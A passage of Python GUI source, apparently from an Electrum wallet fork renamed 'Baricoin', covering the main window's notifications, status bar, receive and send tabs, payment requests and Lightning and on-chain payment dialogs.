_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
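# The whitepaper PDF is embedded in the outputs of this well-known
# transaction. The slicing below is a recovery heuristic: split on the
# repeated 8-byte output-value prefix, drop the push opcodes around each of
# the three 65-byte data pushes per output, and trim the surrounding length
# bytes to reassemble the raw PDF.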
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both baricoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BARI (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
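# Two-way binding between the BTC and fiat amount fields. The `follows` flag
# is a re-entrancy guard: programmatic setText/setAmount calls re-emit
# textChanged, so the field being written is marked as "following" to break
# the feedback loop.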
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
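# More than one known chain tip means a fork is visible; status icons
# switch to their "_fork" variants.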
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
ln_balance = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s' % (self.format_amount_and_units(ln_balance).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The baricoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a baricoin address any number of times but it is not good for your privacy.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
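# Make the static QR widget behave like a button: clicking it toggles the
# detached QR window, and the cursor hints that it is clickable.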
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
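# Keep the tab widget's size reserved while hidden so the layout does not
# jump when maybe_hide_receive_tabs() toggles visibility.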
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Baricoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Baricoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
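# A plugin (e.g. two-factor trustedcoin) may add its own fee on top of the
# mining fee; default to zero if no hook responds.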
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Baricoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
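# nonlocal_only filters out coins whose funding tx exists only locally (not
# yet broadcast); used e.g. when funding a channel, which must not depend on
# unbroadcast parents.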
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
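# '!' is the spend-max sentinel: at most one output may claim the remainder,
# and if present the total output value is unknown until the transaction is
# actually built.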
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
